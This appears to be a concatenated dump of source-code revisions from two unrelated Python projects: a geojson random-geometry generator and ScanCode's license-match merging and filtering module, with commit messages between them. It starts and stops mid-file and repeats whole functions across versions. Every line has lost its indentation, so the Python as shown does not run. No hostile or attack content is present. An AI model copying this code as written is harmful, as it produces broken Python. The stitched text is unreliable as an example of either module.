passed through.
:param featureType: A geometry type
:type string: Point, LineString, Polygon
:param numberFeatures: The number of features that will be returned
:type int: defaults to 1
:param numberVertices: The number vertices that a linestring or polygon will have
:type int: defaults to 3
:param boundingBox: A bounding box in which features will be restricted to
:type string: defaults to the world - [-180.0, -90.0, 180.0, 90.0]
:return: The resulting random geojson object or geometry collection.
:rtype: object
:raises ValueError: if there is no featureType provided.
"""
from geojson import Point, LineString, Polygon, GeometryCollection
import random, math
lonMin = boundingBox[0]
lonMax = boundingBox[2]
def randomLon():
return random.randrange(lonMin, lonMax)
latMin = boundingBox[1]
latMax = boundingBox[3]
def randomLat():
return random.randrange(latMin, latMax)
def createPoint():
return Point((randomLon(), randomLat()))
def createLine():
coords = []
for i in range(0, numberVertices):
coords.append((randomLon(), randomLat()))
return LineString(coords)
def createPoly():
aveRadius = 60
ctrX = 0.1
ctrY = 0.2
irregularity = clip( 0.1, 0, 1 ) * 2 * math.pi / numberVertices
spikeyness = clip( 0.5, 0, 1 ) * aveRadius
# generate n angle steps
angleSteps = []
lower = (2 * math.pi / numberVertices) - irregularity
upper = (2 * math.pi / numberVertices) + irregularity
sum = 0
for i in range(numberVertices):
tmp = random.uniform(lower, upper)
angleSteps.append(tmp)
sum = sum + tmp
# normalize the steps so that point 0 and point n+1 are the same
k = sum / (2 * math.pi)
for i in range(numberVertices):
angleSteps[i] = angleSteps[i] / k
# now generate the points
points = []
angle = random.uniform(0, 2 * math.pi)
for i in range(numberVertices):
r_i = clip(random.gauss(aveRadius, spikeyness), 0, 2 * aveRadius)
x = ctrX + r_i*math.cos(angle)
y = ctrY + r_i*math.sin(angle)
points.append( (int(x), int(y)) )
angle = angle + angleSteps[i]
firstVal = points[0]
points.append(firstVal)
return Polygon([points])
def clip(x, min, max) :
if( min > max ) : return x
elif( x < min ) : return min
elif( x > max ) : return max
else : return x
if numberFeatures > 1:
group = []
for i in range(0, numberFeatures):
if featureType == 'Point':
group.append(createPoint())
elif featureType == 'LineString':
group.append(createLine())
elif featureType == 'Polygon':
group.append(createPoly())
return GeometryCollection(group)
else:
if featureType == 'Point':
return createPoint()
if featureType == 'LineString':
return createLine()
if featureType == 'Polygon':
return createPoly()
Fixed indentation
"""Coordinate utility functions."""
def coords(obj):
"""
Yields the coordinates from a Feature or Geometry.
:param obj: A geometry or feature to extract the coordinates from."
:type obj: Feature, Geometry
:return: A generator with coordinate tuples from the geometry or feature.
:rtype: generator
"""
if isinstance(obj, (tuple, list)):
coordinates = obj
elif 'geometry' in obj:
coordinates = obj['geometry']['coordinates']
else:
coordinates = obj.get('coordinates', obj)
for e in coordinates:
if isinstance(e, (float, int)):
yield tuple(coordinates)
break
for f in coords(e):
yield f
def map_coords(func, obj):
"""
Returns the coordinates from a Geometry after applying the provided
function to the tuples.
:param obj: A geometry or feature to extract the coordinates from.
:type obj: Point, LineString, MultiPoint, MultiLineString, Polygon,
MultiPolygon
:return: The result of applying the function to each coordinate array.
:rtype: list
:raises ValueError: if the provided object is not a Geometry.
"""
if obj['type'] == 'Point':
coordinates = tuple(map(func, obj['coordinates']))
elif obj['type'] in ['LineString', 'MultiPoint']:
coordinates = [tuple(map(func, c)) for c in obj['coordinates']]
elif obj['type'] in ['MultiLineString', 'Polygon']:
coordinates = [[
tuple(map(func, c)) for c in curve]
for curve in obj['coordinates']]
elif obj['type'] == 'MultiPolygon':
coordinates = [[[
tuple(map(func, c)) for c in curve]
for curve in part]
for part in obj['coordinates']]
else:
raise ValueError("Invalid geometry object %s" % repr(obj))
return {'type': obj['type'], 'coordinates': coordinates}
def generate_random(featureType, numberFeatures=1,
numberVertices=3, boundingBox=[-180.0, -90.0, 180.0, 90.0]):
"""
Generates random geojson features depending on the parameters
passed through.
:param featureType: A geometry type
:type string: Point, LineString, Polygon
:param numberFeatures: The number of features that will be returned
:type int: defaults to 1
:param numberVertices: The number vertices that a linestring or polygon will have
:type int: defaults to 3
:param boundingBox: A bounding box in which features will be restricted to
:type string: defaults to the world - [-180.0, -90.0, 180.0, 90.0]
:return: The resulting random geojson object or geometry collection.
:rtype: object
:raises ValueError: if there is no featureType provided.
"""
from geojson import Point, LineString, Polygon, GeometryCollection
import random, math
lonMin = boundingBox[0]
lonMax = boundingBox[2]
def randomLon():
return random.randrange(lonMin, lonMax)
latMin = boundingBox[1]
latMax = boundingBox[3]
def randomLat():
return random.randrange(latMin, latMax)
def createPoint():
return Point((randomLon(), randomLat()))
def createLine():
coords = []
for i in range(0, numberVertices):
coords.append((randomLon(), randomLat()))
return LineString(coords)
def createPoly():
aveRadius = 60
ctrX = 0.1
ctrY = 0.2
irregularity = clip( 0.1, 0, 1 ) * 2 * math.pi / numberVertices
spikeyness = clip( 0.5, 0, 1 ) * aveRadius
# generate n angle steps
angleSteps = []
lower = (2 * math.pi / numberVertices) - irregularity
upper = (2 * math.pi / numberVertices) + irregularity
sum = 0
for i in range(numberVertices):
tmp = random.uniform(lower, upper)
angleSteps.append(tmp)
sum = sum + tmp
# normalize the steps so that point 0 and point n+1 are the same
k = sum / (2 * math.pi)
for i in range(numberVertices):
angleSteps[i] = angleSteps[i] / k
# now generate the points
points = []
angle = random.uniform(0, 2 * math.pi)
for i in range(numberVertices):
r_i = clip(random.gauss(aveRadius, spikeyness), 0, 2 * aveRadius)
x = ctrX + r_i*math.cos(angle)
y = ctrY + r_i*math.sin(angle)
points.append( (int(x), int(y)) )
angle = angle + angleSteps[i]
firstVal = points[0]
points.append(firstVal)
return Polygon([points])
def clip(x, min, max) :
if( min > max ) : return x
elif( x < min ) : return min
elif( x > max ) : return max
else : return x
if numberFeatures > 1:
group = []
for i in range(0, numberFeatures):
if featureType == 'Point':
group.append(createPoint())
elif featureType == 'LineString':
group.append(createLine())
elif featureType == 'Polygon':
group.append(createPoly())
return GeometryCollection(group)
else:
if featureType == 'Point':
return createPoint()
if featureType == 'LineString':
return createLine()
if featureType == 'Polygon':
return createPoly()
|
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, division, print_function
from array import array
from functools import partial
from functools import total_ordering
from hashlib import md5
from itertools import chain
from itertools import groupby
import textwrap
from licensedcode import query
from licensedcode.whoosh_spans.spans import Span
from licensedcode import cache
from licensedcode import MAX_DIST
TRACE = False
TRACE_REPR = False
TRACE_REFINE = False
TRACE_REFINE_SMALL = False
TRACE_FILTER = False
TRACE_MERGE = False
TRACE_MERGE_TEXTS = False
def logger_debug(*args): pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, basestring) and a or repr(a) for a in args))
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
# When soring matches for merging or refining, we divide starts and length by
# ROUNDING with an intergerb division to round values in coarse bands
ROUNDING = 10
# FIXME: Implement each ordering functions. From the Python docs: Note: While
# this decorator makes it easy to create well behaved totally ordered types, it
# does come at the cost of slower execution and more complex stack traces for
# the derived comparison methods. If performance benchmarking indicates this is
# a bottleneck for a given application, implementing all six rich comparison
# methods instead is likely to provide an easy speed boost.
@total_ordering
class LicenseMatch(object):
"""
License detection match to a rule with matched query positions and lines and
matched index positions. Also computes a score for match. At a high level, a
match behaves a bit like a Span and has several similar methods taking into
account both the query and index Span.
"""
__slots__ = 'rule', 'qspan', 'ispan', 'hispan', 'line_by_pos' , 'query_run_start', '_type'
def __init__(self, rule, qspan, ispan, hispan=None, line_by_pos=None, query_run_start=0, _type=''):
"""
Create a new match from:
- rule: matched Rule object
- qspan: query text matched Span, start at zero which is the absolute query start (not the query_run start).
- ispan: rule text matched Span, start at zero which is the rule start.
- hispan: rule text matched Span for high tokens, start at zero which is the rule start. Always a subset of ispan.
- line_by_pos: mapping of (query positions -> line numbers). Line numbers start at one.
Optional: if not provided, the `lines` start and end tuple will be (0, 0) and no line information will be available.
- _type: a string indicating which matching procedure this match was created with. Used for debugging and testing only.
Note the relationship between is the qspan and ispan is such that:
- they always have the exact same number of items but when sorted each value at an index may be different
- the nth position when sorted is such that the token value is equal
"""
self.rule = rule
self.qspan = qspan
self.ispan = ispan
if hispan is None:
hispan = Span()
self.hispan = hispan
self.line_by_pos = line_by_pos or {}
self.query_run_start = query_run_start
self._type = _type
def __repr__(self):
spans = ''
if TRACE_REPR:
qspan = self.qspan
ispan = self.ispan
spans = 'qspan=%(qspan)r, ispan=%(ispan)r, ' % locals()
rep = dict(
rule_id=self.rule.identifier,
rule_licenses=', '.join(sorted(self.rule.licenses)),
score=self.score(),
qlen=self.qlen(),
ilen=self.ilen(),
hilen=self.hilen(),
qreg=(self.qstart, self.qend),
spans=spans,
rlen=self.rule.length,
ireg=(self.istart, self.iend),
lines=self.lines,
_type=self._type,
)
return ('LicenseMatch<%(rule_id)r, %(rule_licenses)r, '
'score=%(score)r, qlen=%(qlen)r, ilen=%(ilen)r, hilen=%(hilen)r, rlen=%(rlen)r, '
'qreg=%(qreg)r, ireg=%(ireg)r, '
'%(spans)s'
'lines=%(lines)r, %(_type)r>') % rep
def __eq__(self, other):
"""
Strict equality.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan
)
def same(self, other):
"""
Return True if other has the same licensing, score and spans.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan)
def same_licensing(self, other):
"""
Return True if other has the same detected license keys.
"""
return self.rule.same_licensing(other.rule)
def __lt__(self, other):
return self.qstart < other.qstart
@property
def qstart(self):
return self.qspan.start
@property
def qend(self):
return self.qspan.end
def qlen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.qspan)
def qmagnitude(self):
return self.qspan.magnitude()
@property
def istart(self):
return self.ispan.start
@property
def iend(self):
return self.ispan.end
def ilen(self):
"""
Return the length of the match as the number of matched index tokens.
"""
return len(self.ispan)
def imagnitude(self):
return self.ispan.magnitude()
@property
def histart(self):
return self.hispan.start
@property
def hiend(self):
return self.hispan.end
def hilen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.hispan)
@property
def lines(self):
return self.line_by_pos.get(self.qstart, 0), self.line_by_pos.get(self.qend, 0)
def __contains__(self, other):
"""
Return True if every other qspan and ispan are contained in any self qspan.
"""
return self.contains_qspan(other) and self.contains_ispan(other)
def contains_qspan(self, other):
return other.qspan.issubset(self.qspan)
def contains_ispan(self, other):
return other.ispan.issubset(self.ispan)
def qdistance_to(self, other):
"""
Return the absolute qspan distance to other match.
Touching and overlapping matches have a zero distance.
"""
return self.qspan.distance_to(other.qspan)
def idistance_to(self, other):
"""
Return the absolute ispan distance from self to other match.
Touching and overlapping matches have a zero distance.
"""
return self.ispan.distance_to(other.ispan)
def qoverlap(self, other):
return self.qspan.overlap(other.qspan)
def ioverlap(self, other):
return self.ispan.overlap(other.ispan)
def overlap(self, other):
"""
Return True if this match spans both overlap with other match spans.
"""
return self.qoverlap(other) and self.ioverlap(other)
def qtouch(self, other):
return self.qspan.touch(other.qspan)
def itouch(self, other):
return self.ispan.touch(other.ispan)
def touch(self, other):
"""
Return True if this match spans both touch other match spans.
"""
return self.qtouch(other) and self.itouch(other)
def qsurround(self, other):
return self.qspan.surround(other.qspan)
def isurround(self, other):
return self.ispan.surround(other.ispan)
def is_qafter(self, other):
return self.qspan.is_after(other.qspan)
def is_iafter(self, other):
return self.ispan.is_after(other.ispan)
def is_after(self, other):
"""
Return True if this match spans are strictly after other match spans.
"""
return self.is_qafter(other) and self.is_iafter(other)
def subtract(self, other):
"""
Subtract an other match from this match by removing overlapping span
items present in both matches from this match.
"""
self.qspan.difference_update(other.qspan)
self.ispan.difference_update(other.ispan)
return self
@staticmethod
def merge(matches, max_dist=MAX_DIST):
"""
Merge overlapping, touching or close-by matches in the given iterable of
matches. Return a new list of merged matches if they can be merged.
Matches that cannot be merged are returned as-is.
Only matches for the same rules can be merged.
The overlap and touch is considered using both the qspan and ispan.
The maximal merge is always returned and eventually a single match per
rule is returned if all matches for that rule can be merged.
For being merged two matches must also be in increasing query and index positions.
"""
# FIXME: longer and denser matches starting at the same qspan should
# be sorted first
# only merge matches with the same licensing_identifier
# iterate on matches grouped by licensing_identifier, one licensing_identifier at a time.
# we divide by ROUNDING with an intergerb division to round values in coarse bands
sorter = lambda m: (m.rule.licensing_identifier, m.qspan.start , -m.qlen(), -m.ilen())
matches = sorted(matches, key=sorter)
merged = []
for _rid, rule_matches in groupby(matches, key=lambda m: m.rule.licensing_identifier):
rule_matches = list(rule_matches)
i = 0
if TRACE_MERGE:
logger_debug('merge_match: processing rule:', rule_matches[0].rule.identifier)
# compare two matches in the sorted sequence: current_match and the next one
while i < len(rule_matches) - 1:
current_match = rule_matches[i]
j = i + 1
if TRACE_MERGE: logger_debug('merge_match: current_match:', current_match)
while j < len(rule_matches):
next_match = rule_matches[j]
if TRACE_MERGE: logger_debug(' merge_match: next_match:', next_match)
if next_match.qdistance_to(current_match) >= max_dist or next_match.idistance_to(current_match) >= max_dist:
break
# remove surrounded matches
if current_match.qsurround(next_match):
# current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 1:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> surround:\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
# next_match is strictly in increasing sequence and within distance
# and same rule
elif (next_match.is_after(current_match)
and current_match.rule == next_match.rule
and next_match.qdistance_to(current_match) < max_dist
and next_match.idistance_to(current_match) < max_dist):
current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 2:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> increasing within dist\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
else:
j += 1
i += 1
merged.extend(rule_matches)
return merged
def combine(self, other):
"""
Return a new match combining self and an other match.
"""
same_rule = self.rule == other.rule
# FIXME: we may be combining apples and oranges by considering same licensing too!
same_licensing = self.same_licensing(other)
if not (same_rule or same_licensing):
raise TypeError('Cannot combine matches with different rules or licensing: from: %(self)r, to: %(other)r' % locals())
if other._type not in self._type:
new_type = ' '.join([self._type, other._type])
else:
new_type = self._type
line_by_pos = dict(self.line_by_pos)
line_by_pos.update(other.line_by_pos)
combined = LicenseMatch(rule=self.rule,
qspan=Span(self.qspan | other.qspan),
ispan=Span(self.ispan | other.ispan),
hispan=Span(self.hispan | other.hispan),
line_by_pos=line_by_pos,
query_run_start=min(self.query_run_start, other.query_run_start),
_type=new_type)
return combined
def update(self, other):
"""
Update self with other match and return self.
"""
combined = self.combine(other)
self.qspan = combined.qspan
self.ispan = combined.ispan
self.hispan = combined.hispan
self.line_by_pos = combined.line_by_pos
self._type = combined._type
self.query_run_start = min(self.query_run_start, other.query_run_start)
return self
def rebase(self, new_query_start, new_query_end, line_by_pos, _type):
"""
Return a copy of this match with a new qspan and new line_by_pos and
updating the _type of match as needed.
"""
return LicenseMatch(
rule=self.rule,
qspan=Span(new_query_start, new_query_end),
ispan=Span(self.ispan),
hispan=Span(self.hispan),
line_by_pos=line_by_pos,
query_run_start=new_query_start,
_type=' '.join([self._type.replace(cache.MATCH_TYPE, '').strip(), _type]),
)
def score(self):
"""
Return the score for this match as a float between 0 and 100.
This is a ratio of matched tokens to the rule length.
"""
# TODO: compute a better score based tf/idf, BM25, applying ratio to low tokens, etc
if not self.rule.length:
return 0
score = self.ilen() / self.rule.length
return round(score * 100, 2)
def small(self):
"""
Return True if this match is "small" based on its rule thresholds.
"""
thresholds = self.rule.thresholds()
min_ihigh = thresholds.min_high
min_ilen = thresholds.min_len
hilen = self.hilen()
ilen = self.ilen()
if TRACE_REFINE_SMALL:
logger_debug('LicenseMatch.small(): hilen=%(hilen)r < min_ihigh=%(min_ihigh)r or ilen=%(ilen)r < min_ilen=%(min_ilen)r : thresholds=%(thresholds)r' % locals(),)
if thresholds.small and self.score() < 50 and (hilen < min_ihigh or ilen < min_ilen):
return True
if hilen < min_ihigh and ilen < min_ilen:
return True
def false_positive(self, idx):
"""
Return a false positive rule id if the LicenseMatch match is a false
positive or None otherwise (nb: not False).
Lookup the matched tokens sequence against the idx index.
"""
ilen = self.ilen()
if ilen > idx.largest_false_positive_length:
return
rule_tokens = idx.tids_by_rid[self.rule.rid]
ispan = self.ispan
matched_itokens = array('h', (tid for ipos, tid in enumerate(rule_tokens) if ipos in ispan))
# note: hash computation is inlined here but MUST be the same code as in match_hash
matched_hash = md5(matched_itokens.tostring()).digest()
return idx.false_positive_rid_by_hash.get(matched_hash)
def filter_matches(matches):
"""
Return a filtered list of LicenseMatch given a `matches` list of
LicenseMatch by removing duplicated or superfluous matches based on matched
positions relation such as sequence, containment, touch, overlap, same
licensing.
Matches that are entirely contained in another bigger match are removed.
When more than one matched position matches the same license(s), only one
match of this set is kept.
"""
matches = sorted(matches, key=lambda m: (m.qstart // ROUNDING, -m.qlen(), -m.ilen()))
if TRACE_FILTER: print('filter_matches: number of matches to process:', len(matches))
discarded = []
# compare two matches in the sorted sequence: current_match and the next one
i = 0
while i < len(matches) - 1:
current_match = matches[i]
j = i + 1
while j < len(matches):
next_match = matches[j]
if TRACE_FILTER: print('filter_match: current_match:', current_match)
if TRACE_FILTER: print(' filter_match: next_match:', next_match)
# Skip qcontained, irrespective of licensing
# FIXME: by construction this CANNOT happen
if current_match.contains_qspan(next_match):
if TRACE_FILTER: print(' filter_matches: next_match in current_match')
del matches[j]
continue
if current_match.qsurround(next_match):
# Skip if next match is surrounded and has same of licensing
if current_match.same_licensing(next_match):
if TRACE_FILTER: print(' filter_matches: next_match in current_match region and same licensing')
del matches[j]
continue
if current_match.qlen() > (next_match.qlen() * 2):
# Skip if next match is surrounded and is much smaller than current
if TRACE_FILTER: print(' filter_matches: remove surrounding with much bigger match')
del matches[j]
continue
# the next_match has some region overlap
if current_match.qstart < next_match.qstart and current_match.qend < next_match.qend:
# compute region overlap
overlapping = [p for p in next_match.qspan if p < current_match.qend]
overlap = len(overlapping)
# over 50 % of overlap: discard
if overlap > (len(next_match.qspan) / 2):
if TRACE_FILTER: print(' filter_matches: remove partially overlapping with much bigger match')
matches[i] = current_match
discarded.append(matches[j])
del matches[j]
continue
j += 1
i += 1
# FIXME: returned discarded too
return matches, discarded
def filter_low_score(matches, min_score=100):
"""
Return a list of matches scoring above `min_score` and a list of matches scoring below.
"""
if not min_score:
return matches, []
kept = []
discarded = []
for match in matches:
if match.score() < min_score:
discarded.append(match)
else:
kept.append(match)
return kept, discarded
def filter_short_matches(matches):
"""
Return a list of matches that are not small and a list of small matches.
"""
kept = []
discarded = []
for match in matches:
if match.small():
if TRACE_REFINE_SMALL: logger_debug('DISCARDING SHORT:', match)
discarded.append(match)
else:
if TRACE_REFINE_SMALL: logger_debug(' ===> NOT DISCARDING SHORT:', match)
kept.append(match)
return kept, discarded
def filter_spurious_matches(matches):
"""
Return a list of matches that are not spurious and a list of spurrious
matches.
"""
kept = []
discarded = []
for match in matches:
qdens = match.qspan.density()
idens = match.ispan.density()
ilen = match.ilen()
hilen = match.hilen()
if ilen < 20 and hilen < 5 and (qdens < 0.3 or idens < 0.3):
if TRACE_REFINE: logger_debug('DISCARDING Spurrious:', match)
discarded.append(match)
else:
kept.append(match)
return kept, discarded
def filter_false_positive_matches(idx, matches):
"""
Return a list of matches that are not false positives and a list of false
positive matches given an index `idx`.
"""
kept = []
discarded = []
for match in matches:
fp = match.false_positive(idx)
if fp is None:
if TRACE_REFINE: logger_debug('NOT DISCARDING FALSE POSITIVE:', match)
kept.append(match)
else:
if TRACE_REFINE: logger_debug('DISCARDING FALSE POSITIVE:', match, 'fp rule:', idx.rules_by_rid[fp].identifier)
discarded.append(match)
return kept, discarded
def refine_matches(matches, idx, min_score=0, max_dist=MAX_DIST):
"""
Return two sequences of matches: one contains refined good matches, and the
other contains matches that were filtered out.
"""
if TRACE: logger_debug()
if TRACE: logger_debug(' #####refine_matches: START matches#', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
all_discarded = []
matches, discarded = filter_short_matches(matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT SHORT #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: SHORT discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches, discarded = filter_false_positive_matches(idx, matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT FALSE POS #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: FALSE POS discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches, discarded = filter_spurious_matches(matches)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT SPURIOUS#', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: SPURIOUS discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches = LicenseMatch.merge(matches, max_dist=MAX_DIST)
logger_debug(' ##### refine_matches: MERGED_matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
matches, discarded = filter_matches(matches)
all_discarded.extend(discarded)
logger_debug(' ##### refine_matches: NOT FILTERED matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' #####refine_matches: FILTERED discarded#', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
if min_score:
matches, discarded = filter_low_score(matches, min_score=min_score)
all_discarded.extend(discarded)
if TRACE: logger_debug(' #####refine_matches: NOT LOW SCORE #', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
if TRACE: logger_debug(' ###refine_matches: LOW SCORE discarded #:', len(discarded))
if TRACE_REFINE: map(logger_debug, discarded)
matches = LicenseMatch.merge(matches, max_dist=MAX_DIST)
logger_debug(' ##### refine_matches: FINAL MERGED_matches#:', len(matches))
if TRACE_REFINE: map(logger_debug, matches)
return matches, all_discarded
def get_texts(match, location=None, query_string=None, idx=None, width=120):
"""
Given a match and a query location of query string return a tuple of wrapped
texts at `width` for:
- the matched query text as a string.
- the matched rule text as a string.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions are represented as <no-match>, rule gaps as <gap>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
assert idx
return (get_matched_qtext(match, location, query_string, idx, width),
get_match_itext(match, width))
def get_matched_qtext(match, location=None, query_string=None, idx=None, width=120):
"""
Return the matched query text as a wrapped string of `width` given a match,
a query location or string and an index.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions are represented as <no-match>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
assert idx
tokens = matched_query_tokens_str(match, location, query_string, idx)
return format_text(tokens, width)
def get_match_itext(match, width=120):
"""
Return the matched rule text as a wrapped string of `width` given a match.
Used primarily to recover the matched texts for testing or reporting.
Unmatched positions inside a matched region are represented as <no-match>
and rule gaps as <gap>.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
If `width` is a number superior to zero, the texts are wrapped to width.
"""
return format_text(matched_rule_tokens_str(match), width)
def format_text(tokens, width=120, no_match='<no-match>'):
"""
Return a formatted text wrapped at `width` given an iterable of tokens.
None tokens for unmatched positions are replaced with `no_match`.
"""
nomatch = lambda s: s or no_match
tokens = map(nomatch, tokens)
# if width =0
noop = lambda x: [x]
wrapper = partial(textwrap.wrap, width=width, break_on_hyphens=False)
wrap = width and wrapper or noop
return u'\n'.join(wrap(u' '.join(tokens)))
def matched_query_tokens_str(match, location=None, query_string=None, idx=None):
"""
Return an iterable of matched query token strings given a query file at
`location` or a `query_string`, a match and an index. Yield None for
unmatched positions.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
Used primarily to recover the matched texts for testing or reporting.
"""
assert idx
dictionary_get = idx.dictionary.get
tokens = (query.query_tokenizer(line, lower=False)
for line in query.query_lines(location, query_string))
tokens = chain.from_iterable(tokens)
match_qspan = match.qspan
match_qspan_start = match_qspan.start
match_qspan_end = match_qspan.end
known_pos = -1
started = False
finished = False
for token in tokens:
token_id = dictionary_get(token.lower())
if token_id is None:
if not started:
continue
if finished:
break
else:
known_pos += 1
if match_qspan_start <= known_pos <= match_qspan_end:
started = True
if known_pos == match_qspan_end:
finished = True
if known_pos in match_qspan and token_id is not None:
yield token
else:
yield None
def matched_rule_tokens_str(match, gap='<gap>'):
"""
Return an iterable of matched rule token strings given a match. Yield None
for unmatched positions. Yield the `gap` string to represent a gap.
Punctuation is removed , spaces are normalized (new line is replaced by a
space), case is preserved.
Used primarily to recover the matched texts for testing or reporting.
"""
span = match.ispan
gaps = match.rule.gaps
for pos, token in enumerate(match.rule.tokens(lower=False)):
if span.start <= pos <= span.end:
tok = None
if pos in span:
tok = token
yield tok
if gaps and pos in gaps:
yield gap
#86 Correctly rebase cache matches
* also use matcher instead of _type
* refine filtering and merging
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, division, print_function
from array import array
from functools import partial
from functools import total_ordering
from hashlib import md5
from itertools import chain
from itertools import groupby
import textwrap
from licensedcode import query
from licensedcode.spans import Span
from licensedcode import cache
from licensedcode import MAX_DIST
"""
LicenseMatch data structure and matches merging and filtering routines.
"""
TRACE = False
TRACE_REPR = False
TRACE_REFINE = False
TRACE_REFINE_SMALL = False
TRACE_FILTER = False
TRACE_MERGE = False
TRACE_MERGE_TEXTS = False
def logger_debug(*args): pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, basestring) and a or repr(a) for a in args))
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
# When soring matches for merging or refining, we divide starts and length by
# ROUNDING with an intergerb division to round values in coarse bands
ROUNDING = 10
# FIXME: Implement each ordering functions. From the Python docs: Note: While
# this decorator makes it easy to create well behaved totally ordered types, it
# does come at the cost of slower execution and more complex stack traces for
# the derived comparison methods. If performance benchmarking indicates this is
# a bottleneck for a given application, implementing all six rich comparison
# methods instead is likely to provide an easy speed boost.
@total_ordering
class LicenseMatch(object):
"""
License detection match to a rule with matched query positions and lines and
matched index positions. Also computes a score for match. At a high level, a
match behaves a bit like a Span and has several similar methods taking into
account both the query and index Span.
"""
__slots__ = 'rule', 'qspan', 'ispan', 'hispan', 'line_by_pos' , 'query_run_start', 'matcher'
def __init__(self, rule, qspan, ispan, hispan=None, line_by_pos=None, query_run_start=0, matcher=''):
"""
Create a new match from:
- rule: matched Rule object
- qspan: query text matched Span, start at zero which is the absolute query start (not the query_run start).
- ispan: rule text matched Span, start at zero which is the rule start.
- hispan: rule text matched Span for high tokens, start at zero which is the rule start. Always a subset of ispan.
- line_by_pos: mapping of (query positions -> line numbers). Line numbers start at one.
Optional: if not provided, the `lines` start and end tuple will be (0, 0) and no line information will be available.
- matcher: a string indicating which matching procedure this match was created with. Used for debugging and testing only.
Note the relationship between is the qspan and ispan is such that:
- they always have the exact same number of items but when sorted each value at an index may be different
- the nth position when sorted is such that the token value is equal
"""
self.rule = rule
self.qspan = qspan
self.ispan = ispan
if hispan is None:
hispan = Span()
self.hispan = hispan
self.line_by_pos = line_by_pos or {}
self.query_run_start = query_run_start
self.matcher = matcher
def __repr__(self):
spans = ''
if TRACE_REPR:
qspan = self.qspan
ispan = self.ispan
spans = 'qspan=%(qspan)r, ispan=%(ispan)r, ' % locals()
rep = dict(
rule_id=self.rule.identifier,
rule_licenses=', '.join(sorted(self.rule.licenses)),
score=self.score(),
qlen=self.qlen(),
ilen=self.ilen(),
hilen=self.hilen(),
qreg=(self.qstart, self.qend),
spans=spans,
rlen=self.rule.length,
